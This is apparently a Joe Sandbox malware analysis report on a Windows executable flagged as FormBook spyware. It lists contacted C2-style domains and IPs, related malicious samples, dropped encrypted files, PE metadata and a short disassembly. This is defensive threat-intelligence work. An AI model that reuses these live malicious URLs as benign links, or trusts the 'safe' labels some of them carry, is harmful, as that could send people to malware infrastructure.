                                                      http://www.madhf.tech/0mwe/?DzLTc=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdYWafZCahkNS.exe, 00000008.00000002.3901668653.0000000002F48000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://duckduckgo.com/chrome_newtabmobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.cstrategy.online/zz3m/?DzLTc=p4da2npHVYx4RJTvd9az3TD7mobsync.exe, 00000006.00000002.3901773244.000000000656A000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003D6A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://duckduckgo.com/ac/?q=mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://securepubads.g.doubleclick.net/tag/js/gpt.jsmobsync.exe, 00000006.00000002.3904569653.0000000007820000.00000004.00000800.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3901773244.00000000063D8000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003BD8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            http://www.litespeedtech.com/error-pagemobsync.exe, 00000006.00000002.3901773244.0000000005424000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000002C24000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1965350475.0000000000BD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.canadavinreport.site/g3h7/?DzLTc=dyqWmobsync.exe, 00000006.00000002.3901773244.00000000058DA000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.00000000030DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.ecosia.org/newtab/mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://keyq.top/$WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003BD8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://playchill.top/api/axgames/request?domain=$mobsync.exe, 00000006.00000002.3904569653.0000000007820000.00000004.00000800.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3901773244.00000000063D8000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003BD8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        http://aballanet.cat/6xrr/?DzLTc=HxJAUmNG5amobsync.exe, 00000006.00000002.3901773244.00000000055B6000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000002DB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.bloodbalancecaps.shopWafZCahkNS.exe, 00000008.00000002.3900807992.00000000022D2000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssmobsync.exe, 00000006.00000002.3901773244.0000000006246000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003A46000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              45.141.156.114
                                                                              		logidant.xyzGermany
                                                                              		30860YURTEH-ASUAfalse
                                                                              165.154.96.210
                                                                              		fap-a13f5c64.faipod.comCanada
                                                                              		7456INTERHOPCAfalse
                                                                              13.248.169.48
                                                                              		www.tals.xyzUnited States
                                                                              		16509AMAZON-02USfalse
                                                                              103.224.182.242
                                                                              		www.madhf.techAustralia
                                                                              		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                                              134.0.14.158
                                                                              		aballanet.catSpain
                                                                              		197712CDMONsistemescdmoncomESfalse
                                                                              172.67.215.235
                                                                              		www.airrelax.shopUnited States
                                                                              		13335CLOUDFLARENETUSfalse
                                                                              188.114.97.3
                                                                              		www.zkdamdjj.shopEuropean Union
                                                                              		13335CLOUDFLARENETUSfalse
                                                                              203.161.42.73
                                                                              		www.brightvision.websiteMalaysia
                                                                              		45899VNPT-AS-VNVNPTCorpVNfalse
                                                                              108.179.253.197
                                                                              		bloodbalancecaps.shopUnited States
                                                                              		46606UNIFIEDLAYER-AS-1USfalse
                                                                              194.76.119.60
                                                                              		cstrategy.onlineItaly
                                                                              		202675KELIWEBITfalse
                                                                              185.27.134.206
                                                                              		www.canadavinreport.siteUnited Kingdom
                                                                              		34119WILDCARD-ASWildcardUKLimitedGBfalse
                                                                              172.67.186.192
                                                                              		www.izmirescortg.xyzUnited States
                                                                              		13335CLOUDFLARENETUSfalse
                                                                              202.79.161.151
                                                                              		r0lqcud7.nbnnn.xyzSingapore
                                                                              		64050BCPL-SGBGPNETGlobalASNSGfalse

                                                                              General Information

                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                              Analysis ID:1589092
                                                                              Start date and time:2025-01-11 09:25:32 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 10m 48s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:11
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:2
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:qbSIgCrCgw.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:bb04679008a1ac6bcd8ca7ff7470e0ee72450562fd87be1e0b8111f0e7ef2d76.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@7/3@14/13
                                                                              EGA Information:
                                                                              • Successful, ratio: 75%
                                                                              HCA Information:
                                                                              • Successful, ratio: 91%
                                                                              • Number of executed functions: 48
                                                                              • Number of non-executed functions: 297
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              03:27:30API Interceptor11058163x Sleep call for process: mobsync.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              45.141.156.114AxKxwW9WGa.exeGet hashmaliciousFormBookBrowse
                                                                              • www.logidant.xyz/iuvu/
                                                                              tfWjjV1LdT.exeGet hashmaliciousFormBookBrowse
                                                                              • www.logidant.xyz/iuvu/
                                                                              M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                                              • www.logidant.xyz/iuvu/
                                                                              Recibos.exeGet hashmaliciousFormBookBrowse
                                                                              • www.logidant.xyz/ctvu/
                                                                              YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                              • www.logidant.xyz/iuvu/
                                                                              BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                              • www.logidant.xyz/iuvu/
                                                                              CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                              • www.logidant.xyz/ctvu/
                                                                              CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                              • www.logidant.xyz/ctvu/
                                                                              Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                              • www.logidant.xyz/iuvu/
                                                                              CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                              • www.logidant.xyz/ctvu/
                                                                              165.154.96.210AxKxwW9WGa.exeGet hashmaliciousFormBookBrowse
                                                                              • www.yunlekeji.top/t322/
                                                                              tfWjjV1LdT.exeGet hashmaliciousFormBookBrowse
                                                                              • www.yunlekeji.top/t322/
                                                                              M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                                              • www.yunlekeji.top/t322/
                                                                              13.248.169.488L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                                                              • www.bcg.services/5onp/
                                                                              z6tNjJC614.exeGet hashmaliciousFormBookBrowse
                                                                              • www.tals.xyz/cpgr/
                                                                              rACq8Eaix6.exeGet hashmaliciousFormBookBrowse
                                                                              • www.lirio.shop/qp0h/
                                                                              ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                                              • www.10000.space/3zfl/
                                                                              n2pGr8w21V.exeGet hashmaliciousFormBookBrowse
                                                                              • www.lovel.shop/rxts/
                                                                              PGK60fNNCZ.exeGet hashmaliciousFormBookBrowse
                                                                              • www.aktmarket.xyz/wb7v/
                                                                              02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.remedies.pro/a42x/
                                                                              zAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                                              • www.aktmarket.xyz/wb7v/
                                                                              SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                                              • www.sfantulandrei.info/wvsm/
                                                                              suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                              • www.optimismbank.xyz/98j3/

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              www.madhf.tech02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 103.224.182.242
                                                                              suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                              • 103.224.182.242
                                                                              AxKxwW9WGa.exeGet hashmaliciousFormBookBrowse
                                                                              • 103.224.182.242
                                                                              tfWjjV1LdT.exeGet hashmaliciousFormBookBrowse
                                                                              • 103.224.182.242
                                                                              M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                                              • 103.224.182.242
                                                                              PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                              • 103.224.182.242
                                                                              Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 103.224.182.242
                                                                              New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                              • 103.224.182.242
                                                                              Purchase Order..exeGet hashmaliciousFormBookBrowse
                                                                              • 103.224.182.242
                                                                              YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                              • 103.224.182.242
                                                                              www.brightvision.websiteYH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                              • 203.161.42.73
                                                                              BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                              • 203.161.42.73
                                                                              Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                              • 203.161.42.73
                                                                              r0lqcud7.nbnnn.xyz02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 27.124.4.246
                                                                              1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                                              • 23.225.160.132
                                                                              suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                              • 23.225.159.42
                                                                              AxKxwW9WGa.exeGet hashmaliciousFormBookBrowse
                                                                              • 27.124.4.246
                                                                              tfWjjV1LdT.exeGet hashmaliciousFormBookBrowse
                                                                              • 27.124.4.246
                                                                              uG3I84bQEr.exeGet hashmaliciousFormBookBrowse
                                                                              • 23.225.159.42
                                                                              M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                                              • 202.79.161.151
                                                                              order confirmation.exeGet hashmaliciousFormBookBrowse
                                                                              • 27.124.4.246
                                                                              UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                              • 23.225.159.42
                                                                              PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                              • 27.124.4.246
                                                                              www.zkdamdjj.shop02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 104.21.40.167
                                                                              suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                              • 188.114.97.3
                                                                              AxKxwW9WGa.exeGet hashmaliciousFormBookBrowse
                                                                              • 188.114.96.3
                                                                              tfWjjV1LdT.exeGet hashmaliciousFormBookBrowse
                                                                              • 188.114.96.3
                                                                              5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                              • 104.21.40.167
                                                                              M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                                              • 188.114.96.3
                                                                              KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                                              • 188.114.96.3
                                                                              Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                              • 172.67.187.114
                                                                              Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 172.67.187.114
                                                                              YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                              • 172.67.187.114

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              AMAZON-02US8L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                                                              • 13.248.169.48
                                                                              6.elfGet hashmaliciousUnknownBrowse
                                                                              • 54.122.159.233
                                                                              SH4.elfGet hashmaliciousUnknownBrowse
                                                                              • 54.171.230.55
                                                                              3.elfGet hashmaliciousUnknownBrowse
                                                                              • 13.214.70.119
                                                                              z6tNjJC614.exeGet hashmaliciousFormBookBrowse
                                                                              • 13.248.169.48
                                                                              5.elfGet hashmaliciousUnknownBrowse
                                                                              • 44.238.49.226
                                                                              rACq8Eaix6.exeGet hashmaliciousFormBookBrowse
                                                                              • 13.248.169.48
                                                                              ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 3.130.71.34
                                                                              plZuPtZoTk.exeGet hashmaliciousFormBookBrowse
                                                                              • 54.67.87.110
                                                                              ARMV4L.elfGet hashmaliciousUnknownBrowse
                                                                              • 54.171.230.55
                                                                              YURTEH-ASUAAxKxwW9WGa.exeGet hashmaliciousFormBookBrowse
                                                                              • 45.141.156.114
                                                                              6.elfGet hashmaliciousUnknownBrowse
                                                                              • 152.89.63.57
                                                                              tfWjjV1LdT.exeGet hashmaliciousFormBookBrowse
                                                                              • 45.141.156.114
                                                                              M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                                              • 45.141.156.114
                                                                              http://www.efnhdh.blogspot.mk/Get hashmaliciousGRQ ScamBrowse
                                                                              • 152.89.61.96
                                                                              https://alluc.co/watch-movies/passengers.htmlGet hashmaliciousUnknownBrowse
                                                                              • 31.42.184.242
                                                                              Recibos.exeGet hashmaliciousFormBookBrowse
                                                                              • 45.141.156.114
                                                                              YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                              • 45.141.156.114
                                                                              BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                              • 45.141.156.114
                                                                              CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                              • 45.141.156.114
                                                                              INTERHOPCAbIcqeSVPW6.exeGet hashmaliciousFormBookBrowse
                                                                              • 165.154.96.210
                                                                              AxKxwW9WGa.exeGet hashmaliciousFormBookBrowse
                                                                              • 165.154.96.210
                                                                              tfWjjV1LdT.exeGet hashmaliciousFormBookBrowse
                                                                              • 165.154.96.210
                                                                              M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                                              • 165.154.96.210
                                                                              arm4.elfGet hashmaliciousMiraiBrowse
                                                                              • 165.154.119.54
                                                                              i686.elfGet hashmaliciousMiraiBrowse
                                                                              • 165.154.144.14
                                                                              la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                              • 165.154.119.65
                                                                              sh4.elfGet hashmaliciousMiraiBrowse
                                                                              • 165.154.120.14
                                                                              https://mj.ostep.net/acknowledgementsGet hashmaliciousUnknownBrowse
                                                                              • 165.154.182.38
                                                                              firmware.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                              • 165.154.232.175

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Temp\10O4645j

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\mobsync.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                              Category:dropped
                                                                              Size (bytes):196608
                                                                              Entropy (8bit):1.1209886597424439
                                                                              Encrypted:false
                                                                              SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                              MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                              SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                              SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                              SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\aut9FD0.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\qbSIgCrCgw.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):287232
                                                                              Entropy (8bit):7.9951456805712535
                                                                              Encrypted:true
                                                                              SSDEEP:6144:E6l7sN894VVdIdT7OHROzYBCKtBHW65iDHGeiUljSqSaB0gxBXwWrl+o:R8g4LNHuYBCA5Vwl5BrxBAKAo
                                                                              MD5:60DA3C5734ADC25F78600BE77434D88C
                                                                              SHA1:447B5CAFCFDA9B7EF6997DFB1670DE369D03EC4D
                                                                              SHA-256:2B2B19222E0C610331CD073CAF812C0C96BBD4B8872FA358ED800DA92E6F642F
                                                                              SHA-512:5B4010C91ECC7873BB68A0ECDDF91FB5E01B952F1465E1099B38D5450E61D2A946995BB08459FAFD1A5CBF61BF0B06F04F4ED62038BED122C0575A7C6901B457
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:.j.XEDJ7U57G..RI.HUXJMC6v8EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFD.7Q59X.HR.@.t.K...bP,;.>*)#8V<.T&&(==i*0x88-._Ve...x++.R.8:MlFRIIHUX3LJ..X"...?.y*P./..|2..R..q#Q."...r8!..^2].'/.RIIHUXJM.s68.I1N.n.*7Q57GHFR.IJTSKFC6f<EH0NXFDJ7.!7GHVRII(QXJM.66(EH0LXFBJ7Q57GH@RIIHUXJM#268GH0NXFDH7..7GXFRYIHUXZMC&68EH0NHFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EfD+ 2DJ7%{3GHVRII.QXJ]C668EH0NXFDJ7Q.7G(FRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH

                                                                              C:\Users\user\AppData\Local\Temp\colliquefaction

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\qbSIgCrCgw.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):287232
                                                                              Entropy (8bit):7.9951456805712535
                                                                              Encrypted:true
                                                                              SSDEEP:6144:E6l7sN894VVdIdT7OHROzYBCKtBHW65iDHGeiUljSqSaB0gxBXwWrl+o:R8g4LNHuYBCA5Vwl5BrxBAKAo
                                                                              MD5:60DA3C5734ADC25F78600BE77434D88C
                                                                              SHA1:447B5CAFCFDA9B7EF6997DFB1670DE369D03EC4D
                                                                              SHA-256:2B2B19222E0C610331CD073CAF812C0C96BBD4B8872FA358ED800DA92E6F642F
                                                                              SHA-512:5B4010C91ECC7873BB68A0ECDDF91FB5E01B952F1465E1099B38D5450E61D2A946995BB08459FAFD1A5CBF61BF0B06F04F4ED62038BED122C0575A7C6901B457
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:.j.XEDJ7U57G..RI.HUXJMC6v8EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFD.7Q59X.HR.@.t.K...bP,;.>*)#8V<.T&&(==i*0x88-._Ve...x++.R.8:MlFRIIHUX3LJ..X"...?.y*P./..|2..R..q#Q."...r8!..^2].'/.RIIHUXJM.s68.I1N.n.*7Q57GHFR.IJTSKFC6f<EH0NXFDJ7.!7GHVRII(QXJM.66(EH0LXFBJ7Q57GH@RIIHUXJM#268GH0NXFDH7..7GXFRYIHUXZMC&68EH0NHFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EfD+ 2DJ7%{3GHVRII.QXJ]C668EH0NXFDJ7Q.7G(FRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.1564384844054825
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:qbSIgCrCgw.exe
                                                                              File size:1'223'168 bytes
                                                                              MD5:8057aaa332a2045b3acb5040bad45772
                                                                              SHA1:224c921be20a4e4c3b627f0dc01bd5c896ca122b
                                                                              SHA256:bb04679008a1ac6bcd8ca7ff7470e0ee72450562fd87be1e0b8111f0e7ef2d76
                                                                              SHA512:6215152720aab91a7f4ed09d444cac7a44a9f053c2adc5f8a2cedf8ac874c4db042183213020e57175719233f1b1a7659bde6337e6dec1b66c4c2c4607732773
                                                                              SSDEEP:24576:1tb20pkaCqT5TBWgNQ7aHfIuPco8vnw9na4ntkCLuYwq/ch6A:mVg5tQ7aHgNpvnwpjz/85
                                                                              TLSH:D745CF1273DE8361C3B25273BA25B701BEBF782506A1F96B2FD4093DF920162525E673
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                              File Icon

                                                                              Icon Hash:aaf3e3e3938382a0

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x425f74
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x6749071D [Fri Nov 29 00:13:17 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:1
                                                                              File Version Major:5
                                                                              File Version Minor:1
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:1
                                                                              Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              call 00007F033CD8992Fh
                                                                              jmp 00007F033CD7C944h
                                                                              int3
                                                                              int3
                                                                              push edi
                                                                              push esi
                                                                              mov esi, dword ptr [esp+10h]
                                                                              mov ecx, dword ptr [esp+14h]
                                                                              mov edi, dword ptr [esp+0Ch]
                                                                              mov eax, ecx
                                                                              mov edx, ecx
                                                                              add eax, esi
                                                                              cmp edi, esi
                                                                              jbe 00007F033CD7CACAh
                                                                              cmp edi, eax
                                                                              jc 00007F033CD7CE2Eh
                                                                              bt dword ptr [004C0158h], 01h
                                                                              jnc 00007F033CD7CAC9h
                                                                              rep movsb
                                                                              jmp 00007F033CD7CDDCh
                                                                              cmp ecx, 00000080h
                                                                              jc 00007F033CD7CC94h
                                                                              mov eax, edi
                                                                              xor eax, esi
                                                                              test eax, 0000000Fh
                                                                              jne 00007F033CD7CAD0h
                                                                              bt dword ptr [004BA370h], 01h
                                                                              jc 00007F033CD7CFA0h
                                                                              bt dword ptr [004C0158h], 00000000h
                                                                              jnc 00007F033CD7CC6Dh
                                                                              test edi, 00000003h
                                                                              jne 00007F033CD7CC7Eh
                                                                              test esi, 00000003h
                                                                              jne 00007F033CD7CC5Dh
                                                                              bt edi, 02h
                                                                              jnc 00007F033CD7CACFh
                                                                              mov eax, dword ptr [esi]
                                                                              sub ecx, 04h
                                                                              lea esi, dword ptr [esi+04h]
                                                                              mov dword ptr [edi], eax
                                                                              lea edi, dword ptr [edi+04h]
                                                                              bt edi, 03h
                                                                              jnc 00007F033CD7CAD3h
                                                                              movq xmm1, qword ptr [esi]
                                                                              sub ecx, 08h
